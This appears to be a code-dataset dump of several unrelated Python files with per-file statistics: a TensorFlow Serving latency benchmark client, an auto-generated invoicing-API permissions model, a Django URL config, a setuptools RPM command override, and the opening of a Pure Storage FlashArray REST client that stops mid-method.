# SPDX-License-Identifier: EPL-2.0
#
"""Send simulated image data to tensorflow_model_server loaded with ResNet50 or InceptionV3 model.
"""
from __future__ import print_function
import os
import random
import grpc
import numpy as np
import sys
import tensorflow as tf
import tensorflow.compat.v1 as tf_v1
import time
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2_grpc
from util import preprocess_image, parse_example_proto
tf_v1.disable_eager_execution()
tf_v1.app.flags.DEFINE_string('server', 'localhost:8500', 'PredictionService host:port')
tf_v1.app.flags.DEFINE_integer('batch_size', 1, 'Batch size to use')
tf_v1.app.flags.DEFINE_string('data_dir', '', 'path to images in TF records format')
tf_v1.app.flags.DEFINE_string('model', 'resnet50', 'Name of model (resnet50 or inceptionv3).')
FLAGS = tf_v1.app.flags.FLAGS
def sample_images(image_size):
"""Pull a random batch of images from FLAGS.data_dir containing TF record formatted ImageNet validation set
Returns:
ndarray of float32 with shape [FLAGS.batch_size, image_size, image_size, 3]
"""
sample_file = random.choice(os.listdir(FLAGS.data_dir))
dataset = tf.data.TFRecordDataset(os.path.join(FLAGS.data_dir, sample_file))
dataset = dataset.map(lambda x: parse_example_proto(x)).shuffle(True).batch(FLAGS.batch_size)
iterator = dataset.make_one_shot_iterator()
next_element = iterator.get_next()
with tf.Session() as sess:
images, labels = sess.run(next_element)
images = np.array([sess.run(preprocess_image(x, FLAGS.model, image_size)) for x in images])
return images
def main(_):
if FLAGS.model == 'resnet50':
image_size = 224
elif FLAGS.model == 'inceptionv3':
image_size = 299
else:
print('Please specify model as either resnet50 or inceptionv3.')
sys.exit(-1)
channel = grpc.insecure_channel(FLAGS.server)
stub = prediction_service_pb2_grpc.PredictionServiceStub(channel)
i = 0
num_iteration = 40
warm_up_iteration = 10
total_time = 0
for _ in range(num_iteration):
i += 1
if FLAGS.data_dir:
image_np = sample_images(image_size)
else:
image_np = np.random.rand(FLAGS.batch_size, image_size, image_size, 3).astype(np.float32)
if FLAGS.model == 'resnet50':
# For ResNet50, rescale to [0, 256]
image_np *= 256.0
elif FLAGS.model == 'inceptionv3':
# For InceptionV3, rescale to [-1, 1]
image_np = (image_np - 0.5) * 2.0
request = predict_pb2.PredictRequest()
request.model_spec.name = FLAGS.model
request.model_spec.signature_name = 'serving_default'
request.inputs['input'].CopyFrom(
tf.make_tensor_proto(image_np, shape=[FLAGS.batch_size, image_size, image_size, 3]))
start_time = time.time()
stub.Predict(request, 10.0) # 10 secs timeout
time_consume = time.time() - start_time
print('Iteration %d: %.3f sec' % (i, time_consume))
if i > warm_up_iteration:
total_time += time_consume
time_average = total_time / (num_iteration - warm_up_iteration)
print('Average time: %.3f sec' % (time_average))
print('Batch size = %d' % FLAGS.batch_size)
if (FLAGS.batch_size == 1):
print('Latency: %.3f ms' % (time_average * 1000))
print('Throughput: %.3f images/sec' % (FLAGS.batch_size / time_average))
if __name__ == '__main__':
tf_v1.app.run()
| 35.958333 | 112 | 0.672074 |
from __future__ import print_function
import os
import random
import grpc
import numpy as np
import sys
import tensorflow as tf
import tensorflow.compat.v1 as tf_v1
import time
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2_grpc
from util import preprocess_image, parse_example_proto
tf_v1.disable_eager_execution()
tf_v1.app.flags.DEFINE_string('server', 'localhost:8500', 'PredictionService host:port')
tf_v1.app.flags.DEFINE_integer('batch_size', 1, 'Batch size to use')
tf_v1.app.flags.DEFINE_string('data_dir', '', 'path to images in TF records format')
tf_v1.app.flags.DEFINE_string('model', 'resnet50', 'Name of model (resnet50 or inceptionv3).')
FLAGS = tf_v1.app.flags.FLAGS
def sample_images(image_size):
sample_file = random.choice(os.listdir(FLAGS.data_dir))
dataset = tf.data.TFRecordDataset(os.path.join(FLAGS.data_dir, sample_file))
dataset = dataset.map(lambda x: parse_example_proto(x)).shuffle(True).batch(FLAGS.batch_size)
iterator = dataset.make_one_shot_iterator()
next_element = iterator.get_next()
with tf.Session() as sess:
images, labels = sess.run(next_element)
images = np.array([sess.run(preprocess_image(x, FLAGS.model, image_size)) for x in images])
return images
def main(_):
if FLAGS.model == 'resnet50':
image_size = 224
elif FLAGS.model == 'inceptionv3':
image_size = 299
else:
print('Please specify model as either resnet50 or inceptionv3.')
sys.exit(-1)
channel = grpc.insecure_channel(FLAGS.server)
stub = prediction_service_pb2_grpc.PredictionServiceStub(channel)
i = 0
num_iteration = 40
warm_up_iteration = 10
total_time = 0
for _ in range(num_iteration):
i += 1
if FLAGS.data_dir:
image_np = sample_images(image_size)
else:
image_np = np.random.rand(FLAGS.batch_size, image_size, image_size, 3).astype(np.float32)
if FLAGS.model == 'resnet50':
image_np *= 256.0
elif FLAGS.model == 'inceptionv3':
image_np = (image_np - 0.5) * 2.0
request = predict_pb2.PredictRequest()
request.model_spec.name = FLAGS.model
request.model_spec.signature_name = 'serving_default'
request.inputs['input'].CopyFrom(
tf.make_tensor_proto(image_np, shape=[FLAGS.batch_size, image_size, image_size, 3]))
start_time = time.time()
stub.Predict(request, 10.0)
time_consume = time.time() - start_time
print('Iteration %d: %.3f sec' % (i, time_consume))
if i > warm_up_iteration:
total_time += time_consume
time_average = total_time / (num_iteration - warm_up_iteration)
print('Average time: %.3f sec' % (time_average))
print('Batch size = %d' % FLAGS.batch_size)
if (FLAGS.batch_size == 1):
print('Latency: %.3f ms' % (time_average * 1000))
print('Throughput: %.3f images/sec' % (FLAGS.batch_size / time_average))
if __name__ == '__main__':
tf_v1.app.run()
| true | true |
f7325b9e40c3db2e572ba5e1f7ec33a8559aa03b | 18,306 | py | Python | fattureincloud_python_sdk/model/permissions.py | fattureincloud/fattureincloud-python-sdk | f3a40fac345751014ea389680efdaef90f03bac1 | [
"MIT"
] | 2 | 2022-02-17T08:33:17.000Z | 2022-03-22T09:27:00.000Z | fattureincloud_python_sdk/model/permissions.py | fattureincloud/fattureincloud-python-sdk | f3a40fac345751014ea389680efdaef90f03bac1 | [
"MIT"
] | null | null | null | fattureincloud_python_sdk/model/permissions.py | fattureincloud/fattureincloud-python-sdk | f3a40fac345751014ea389680efdaef90f03bac1 | [
"MIT"
] | null | null | null | """
Fatture in Cloud API v2 - API Reference
Connect your software with Fatture in Cloud, the invoicing platform chosen by more than 400.000 businesses in Italy. The Fatture in Cloud API is based on REST, and makes possible to interact with the user related data prior authorization via OAuth2 protocol. # noqa: E501
The version of the OpenAPI document: 2.0.15
Contact: info@fattureincloud.it
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from fattureincloud_python_sdk.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel
)
from fattureincloud_python_sdk.exceptions import ApiAttributeError
def lazy_import():
from fattureincloud_python_sdk.model.permission_level import PermissionLevel
from fattureincloud_python_sdk.model.permissions_fic_issued_documents_detailed import PermissionsFicIssuedDocumentsDetailed
globals()['PermissionLevel'] = PermissionLevel
globals()['PermissionsFicIssuedDocumentsDetailed'] = PermissionsFicIssuedDocumentsDetailed
class Permissions(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = True
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'fic_situation': (PermissionLevel,), # noqa: E501
'fic_clients': (PermissionLevel,), # noqa: E501
'fic_suppliers': (PermissionLevel,), # noqa: E501
'fic_products': (PermissionLevel,), # noqa: E501
'fic_issued_documents': (PermissionLevel,), # noqa: E501
'fic_received_documents': (PermissionLevel,), # noqa: E501
'fic_receipts': (PermissionLevel,), # noqa: E501
'fic_calendar': (PermissionLevel,), # noqa: E501
'fic_archive': (PermissionLevel,), # noqa: E501
'fic_taxes': (PermissionLevel,), # noqa: E501
'fic_stock': (PermissionLevel,), # noqa: E501
'fic_cashbook': (PermissionLevel,), # noqa: E501
'fic_settings': (PermissionLevel,), # noqa: E501
'fic_emails': (PermissionLevel,), # noqa: E501
'fic_export': (PermissionLevel,), # noqa: E501
'fic_import_bankstatements': (PermissionLevel,), # noqa: E501
'fic_import_clients_suppliers': (PermissionLevel,), # noqa: E501
'fic_import_issued_documents': (PermissionLevel,), # noqa: E501
'fic_import_products': (PermissionLevel,), # noqa: E501
'fic_recurring': (PermissionLevel,), # noqa: E501
'fic_riba': (PermissionLevel,), # noqa: E501
'dic_employees': (PermissionLevel,), # noqa: E501
'dic_settings': (PermissionLevel,), # noqa: E501
'dic_timesheet': (PermissionLevel,), # noqa: E501
'fic_issued_documents_detailed': (PermissionsFicIssuedDocumentsDetailed,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'fic_situation': 'fic_situation', # noqa: E501
'fic_clients': 'fic_clients', # noqa: E501
'fic_suppliers': 'fic_suppliers', # noqa: E501
'fic_products': 'fic_products', # noqa: E501
'fic_issued_documents': 'fic_issued_documents', # noqa: E501
'fic_received_documents': 'fic_received_documents', # noqa: E501
'fic_receipts': 'fic_receipts', # noqa: E501
'fic_calendar': 'fic_calendar', # noqa: E501
'fic_archive': 'fic_archive', # noqa: E501
'fic_taxes': 'fic_taxes', # noqa: E501
'fic_stock': 'fic_stock', # noqa: E501
'fic_cashbook': 'fic_cashbook', # noqa: E501
'fic_settings': 'fic_settings', # noqa: E501
'fic_emails': 'fic_emails', # noqa: E501
'fic_export': 'fic_export', # noqa: E501
'fic_import_bankstatements': 'fic_import_bankstatements', # noqa: E501
'fic_import_clients_suppliers': 'fic_import_clients_suppliers', # noqa: E501
'fic_import_issued_documents': 'fic_import_issued_documents', # noqa: E501
'fic_import_products': 'fic_import_products', # noqa: E501
'fic_recurring': 'fic_recurring', # noqa: E501
'fic_riba': 'fic_riba', # noqa: E501
'dic_employees': 'dic_employees', # noqa: E501
'dic_settings': 'dic_settings', # noqa: E501
'dic_timesheet': 'dic_timesheet', # noqa: E501
'fic_issued_documents_detailed': 'fic_issued_documents_detailed', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs): # noqa: E501
"""Permissions - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
fic_situation (PermissionLevel): [optional] # noqa: E501
fic_clients (PermissionLevel): [optional] # noqa: E501
fic_suppliers (PermissionLevel): [optional] # noqa: E501
fic_products (PermissionLevel): [optional] # noqa: E501
fic_issued_documents (PermissionLevel): [optional] # noqa: E501
fic_received_documents (PermissionLevel): [optional] # noqa: E501
fic_receipts (PermissionLevel): [optional] # noqa: E501
fic_calendar (PermissionLevel): [optional] # noqa: E501
fic_archive (PermissionLevel): [optional] # noqa: E501
fic_taxes (PermissionLevel): [optional] # noqa: E501
fic_stock (PermissionLevel): [optional] # noqa: E501
fic_cashbook (PermissionLevel): [optional] # noqa: E501
fic_settings (PermissionLevel): [optional] # noqa: E501
fic_emails (PermissionLevel): [optional] # noqa: E501
fic_export (PermissionLevel): [optional] # noqa: E501
fic_import_bankstatements (PermissionLevel): [optional] # noqa: E501
fic_import_clients_suppliers (PermissionLevel): [optional] # noqa: E501
fic_import_issued_documents (PermissionLevel): [optional] # noqa: E501
fic_import_products (PermissionLevel): [optional] # noqa: E501
fic_recurring (PermissionLevel): [optional] # noqa: E501
fic_riba (PermissionLevel): [optional] # noqa: E501
dic_employees (PermissionLevel): [optional] # noqa: E501
dic_settings (PermissionLevel): [optional] # noqa: E501
dic_timesheet (PermissionLevel): [optional] # noqa: E501
fic_issued_documents_detailed (PermissionsFicIssuedDocumentsDetailed): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""Permissions - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
fic_situation (PermissionLevel): [optional] # noqa: E501
fic_clients (PermissionLevel): [optional] # noqa: E501
fic_suppliers (PermissionLevel): [optional] # noqa: E501
fic_products (PermissionLevel): [optional] # noqa: E501
fic_issued_documents (PermissionLevel): [optional] # noqa: E501
fic_received_documents (PermissionLevel): [optional] # noqa: E501
fic_receipts (PermissionLevel): [optional] # noqa: E501
fic_calendar (PermissionLevel): [optional] # noqa: E501
fic_archive (PermissionLevel): [optional] # noqa: E501
fic_taxes (PermissionLevel): [optional] # noqa: E501
fic_stock (PermissionLevel): [optional] # noqa: E501
fic_cashbook (PermissionLevel): [optional] # noqa: E501
fic_settings (PermissionLevel): [optional] # noqa: E501
fic_emails (PermissionLevel): [optional] # noqa: E501
fic_export (PermissionLevel): [optional] # noqa: E501
fic_import_bankstatements (PermissionLevel): [optional] # noqa: E501
fic_import_clients_suppliers (PermissionLevel): [optional] # noqa: E501
fic_import_issued_documents (PermissionLevel): [optional] # noqa: E501
fic_import_products (PermissionLevel): [optional] # noqa: E501
fic_recurring (PermissionLevel): [optional] # noqa: E501
fic_riba (PermissionLevel): [optional] # noqa: E501
dic_employees (PermissionLevel): [optional] # noqa: E501
dic_settings (PermissionLevel): [optional] # noqa: E501
dic_timesheet (PermissionLevel): [optional] # noqa: E501
fic_issued_documents_detailed (PermissionsFicIssuedDocumentsDetailed): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| 50.709141 | 278 | 0.60106 |
import re
import sys
from fattureincloud_python_sdk.model_utils import (
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel
)
from fattureincloud_python_sdk.exceptions import ApiAttributeError
def lazy_import():
from fattureincloud_python_sdk.model.permission_level import PermissionLevel
from fattureincloud_python_sdk.model.permissions_fic_issued_documents_detailed import PermissionsFicIssuedDocumentsDetailed
globals()['PermissionLevel'] = PermissionLevel
globals()['PermissionsFicIssuedDocumentsDetailed'] = PermissionsFicIssuedDocumentsDetailed
class Permissions(ModelNormal):
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,)
_nullable = True
@cached_property
def openapi_types():
lazy_import()
return {
'fic_situation': (PermissionLevel,),
'fic_clients': (PermissionLevel,),
'fic_suppliers': (PermissionLevel,),
'fic_products': (PermissionLevel,),
'fic_issued_documents': (PermissionLevel,),
'fic_received_documents': (PermissionLevel,),
'fic_receipts': (PermissionLevel,),
'fic_calendar': (PermissionLevel,),
'fic_archive': (PermissionLevel,),
'fic_taxes': (PermissionLevel,),
'fic_stock': (PermissionLevel,),
'fic_cashbook': (PermissionLevel,),
'fic_settings': (PermissionLevel,),
'fic_emails': (PermissionLevel,),
'fic_export': (PermissionLevel,),
'fic_import_bankstatements': (PermissionLevel,),
'fic_import_clients_suppliers': (PermissionLevel,),
'fic_import_issued_documents': (PermissionLevel,),
'fic_import_products': (PermissionLevel,),
'fic_recurring': (PermissionLevel,),
'fic_riba': (PermissionLevel,),
'dic_employees': (PermissionLevel,),
'dic_settings': (PermissionLevel,),
'dic_timesheet': (PermissionLevel,),
'fic_issued_documents_detailed': (PermissionsFicIssuedDocumentsDetailed,),
}
@cached_property
def discriminator():
return None
attribute_map = {
'fic_situation': 'fic_situation',
'fic_clients': 'fic_clients',
'fic_suppliers': 'fic_suppliers',
'fic_products': 'fic_products',
'fic_issued_documents': 'fic_issued_documents',
'fic_received_documents': 'fic_received_documents',
'fic_receipts': 'fic_receipts',
'fic_calendar': 'fic_calendar',
'fic_archive': 'fic_archive',
'fic_taxes': 'fic_taxes',
'fic_stock': 'fic_stock',
'fic_cashbook': 'fic_cashbook',
'fic_settings': 'fic_settings',
'fic_emails': 'fic_emails',
'fic_export': 'fic_export',
'fic_import_bankstatements': 'fic_import_bankstatements',
'fic_import_clients_suppliers': 'fic_import_clients_suppliers',
'fic_import_issued_documents': 'fic_import_issued_documents',
'fic_import_products': 'fic_import_products',
'fic_recurring': 'fic_recurring',
'fic_riba': 'fic_riba',
'dic_employees': 'dic_employees',
'dic_settings': 'dic_settings',
'dic_timesheet': 'dic_timesheet',
'fic_issued_documents_detailed': 'fic_issued_documents_detailed',
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| true | true |
f7325bdb93b55decc83345de041763385b298627 | 847 | py | Python | arboretum_project/arboretum_project/urls.py | m-libbrecht/django-arboretum | 11b97254ed9885b03d25d99188157c3f79a14a4f | [
"MIT"
] | null | null | null | arboretum_project/arboretum_project/urls.py | m-libbrecht/django-arboretum | 11b97254ed9885b03d25d99188157c3f79a14a4f | [
"MIT"
] | null | null | null | arboretum_project/arboretum_project/urls.py | m-libbrecht/django-arboretum | 11b97254ed9885b03d25d99188157c3f79a14a4f | [
"MIT"
] | null | null | null | """arboretum URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
from demoapp.views import TreeView
urlpatterns = [
url(r'^$', TreeView.as_view(), name='home'),
url(r'^admin/', include(admin.site.urls)),
]
| 30.25 | 77 | 0.700118 |
from django.conf.urls import include, url
from django.contrib import admin
from demoapp.views import TreeView
urlpatterns = [
url(r'^$', TreeView.as_view(), name='home'),
url(r'^admin/', include(admin.site.urls)),
]
| true | true |
f7325c79a928bd9ff8953a9a81a3e2e12fa93031 | 855 | py | Python | python3-virtualenv/lib/python3.8/site-packages/setuptools/command/bdist_rpm.py | bbalkaransingh23888/OrientationHack | 7eae6cce1226112c000ea8a175f6dc5a82ee0ac2 | [
"MIT"
] | null | null | null | python3-virtualenv/lib/python3.8/site-packages/setuptools/command/bdist_rpm.py | bbalkaransingh23888/OrientationHack | 7eae6cce1226112c000ea8a175f6dc5a82ee0ac2 | [
"MIT"
] | null | null | null | python3-virtualenv/lib/python3.8/site-packages/setuptools/command/bdist_rpm.py | bbalkaransingh23888/OrientationHack | 7eae6cce1226112c000ea8a175f6dc5a82ee0ac2 | [
"MIT"
] | null | null | null | import distutils.command.bdist_rpm as orig
class bdist_rpm(orig.bdist_rpm):
"""
Override the default bdist_rpm behavior to do the following:
1. Run egg_info to ensure the name and version are properly calculated.
2. Always run 'install' using --single-version-externally-managed to
disable eggs in RPM distributions.
"""
def run(self):
# ensure distro name is up-to-date
self.run_command("egg_info")
orig.bdist_rpm.run(self)
def _make_spec_file(self):
spec = orig.bdist_rpm._make_spec_file(self)
spec = [
line.replace(
"setup.py install ",
"setup.py install --single-version-externally-managed ",
).replace("%setup", "%setup -n %{name}-%{unmangled_version}")
for line in spec
]
return spec
| 29.482759 | 75 | 0.617544 | import distutils.command.bdist_rpm as orig
class bdist_rpm(orig.bdist_rpm):
def run(self):
self.run_command("egg_info")
orig.bdist_rpm.run(self)
def _make_spec_file(self):
spec = orig.bdist_rpm._make_spec_file(self)
spec = [
line.replace(
"setup.py install ",
"setup.py install --single-version-externally-managed ",
).replace("%setup", "%setup -n %{name}-%{unmangled_version}")
for line in spec
]
return spec
| true | true |
f7325c9bd6d6204726d8f2c239e94b0f13af7be3 | 83,032 | py | Python | purestorage/purestorage.py | kjetijor/rest-client | 43934a78e95e9719584a66189e4c4851eeb9ebaf | [
"BSD-2-Clause"
] | null | null | null | purestorage/purestorage.py | kjetijor/rest-client | 43934a78e95e9719584a66189e4c4851eeb9ebaf | [
"BSD-2-Clause"
] | null | null | null | purestorage/purestorage.py | kjetijor/rest-client | 43934a78e95e9719584a66189e4c4851eeb9ebaf | [
"BSD-2-Clause"
] | null | null | null | """
This library provides an easy way to script administration tasks for the
Pure Storage FlashArray.
When passing arguments to methods that take \*\*kwargs, the exact
parameters that can be passed can be found in the REST API guide for the
given release of Purity running on the FlashArray.
"""
import json
import requests
from distutils.version import LooseVersion
# The current version of this library.
VERSION = "1.11.3"
class FlashArray(object):
"""Represents a Pure Storage FlashArray and exposes administrative APIs.
:param target: IP address or domain name of the target array's management
interface.
:type target: str
:param username: Username of the user with which to log in.
:type username: str, optional
:param password: Password of the user with which to log in.
:type password: str, optional
:param api_token: API token of the user with which to log in.
:type api_token: str, optional
:param rest_version: REST API version to use when communicating with
target array.
:type rest_version: str, optional
:param verify_https: Enable SSL certificate verification for HTTPS requests.
:type verify_https: bool, optional
:param ssl_cert: Path to SSL certificate or CA Bundle file. Ignored if
verify_https=False.
:type ssl_cert: str, optional
:param user_agent: String to be used as the HTTP User-Agent for requests.
:type user_agent: str, optional
:raises: :class:`PureError`
- If the target array cannot be found.
- If the target array does not support any of the REST versions used by
this library.
- If the username and password or api_token are invalid.
:raises: :class:`ValueError`
- If no api_token or username and password are specified.
- If an api_token and a username or password are specified.
- If the specified rest_version is not supported by this library or by
the target array.
.. note::
The FlashArray constructor requires either a username and password or
an api_token but not both.
.. note::
If a rest_version is not specified, the FlashArray object uses the
highest REST API version supported by both the target array and this
library. If the REST API version should become deprecated during the
lifetime of the FlashArray object, the object renegotiates a REST
version to use and continues running.
.. note::
If a rest_version is specified, that version is used so long as it is
supported by both the target array and this library. In this case, the
FlashArray object does not attempt to renegotiate the REST API version.
"""
supported_rest_versions = [
"1.11",
"1.10",
"1.9",
"1.8",
"1.7",
"1.6",
"1.5",
"1.4",
"1.3",
"1.2",
"1.1",
"1.0",
]
def __init__(self, target, username=None, password=None, api_token=None,
rest_version=None, verify_https=False, ssl_cert=None,
user_agent=None):
if not api_token and not (username and password):
raise ValueError(
"Must specify API token or both username and password.")
elif api_token and (username or password):
raise ValueError(
"Specify only API token or both username and password.")
self._cookies = {}
self._target = target
self._renegotiate_rest_version = False if rest_version else True
self._verify_https = verify_https
self._ssl_cert = ssl_cert
self._user_agent = user_agent
self._rest_version = rest_version
if self._rest_version:
self._rest_version = self._check_rest_version(rest_version)
else:
self._rest_version = self._choose_rest_version()
self._api_token = (api_token or self._obtain_api_token(username, password))
self._start_session()
def _request(self, method, path, data=None, reestablish_session=True):
"""Perform HTTP request for REST API."""
if path.startswith("https://"):
url = path # For cases where URL of different form is needed.
else:
url = "https://{0}/api/{1}/{2}".format(
self._target, self._rest_version, path)
headers = {"Content-Type": "application/json"}
if self._user_agent:
headers['User-Agent'] = self._user_agent
body = json.dumps(data).encode("utf-8")
verify = False
if self._verify_https:
if self._ssl_cert:
verify = self._ssl_cert
else:
verify = True
try:
response = requests.request(method, url, data=body, headers=headers,
cookies=self._cookies, verify=verify)
except requests.exceptions.RequestException as err:
# error outside scope of HTTP status codes
# e.g. unable to resolve domain name
raise PureError(err.message)
if response.status_code == 200:
if "application/json" in response.headers.get("Content-Type", ""):
if response.cookies:
self._cookies.update(response.cookies)
else:
self._cookies.clear()
content = response.json()
if isinstance(content, list):
content = ResponseList(content)
elif isinstance(content, dict):
content = ResponseDict(content)
content.headers = response.headers
return content
raise PureError("Response not in JSON: " + response.text)
